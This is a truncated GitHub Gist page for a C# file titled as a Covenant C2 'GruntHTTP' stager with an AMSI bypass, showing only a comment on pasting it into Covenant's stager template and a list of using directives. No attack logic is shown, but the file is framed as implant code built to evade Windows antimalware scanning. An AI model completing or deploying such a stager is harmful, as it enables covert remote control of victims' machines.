Skip to content

Instantly share code, notes, and snippets.

@andrew-dvs
andrew-dvs / httpgrunt_amsibypass.cs
Created March 20, 2021 10:55 — forked from ChoiSG/httpgrunt_amsibypass.cs
httpgrunt with amsi bypass
// This is a Covenant Template file. Go to Covenant ==> Template ==> GruntHTTP ==> Stager Code
// and copy/paste this.
using System;
using System.Net;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.IO.Pipes;
using System.Reflection;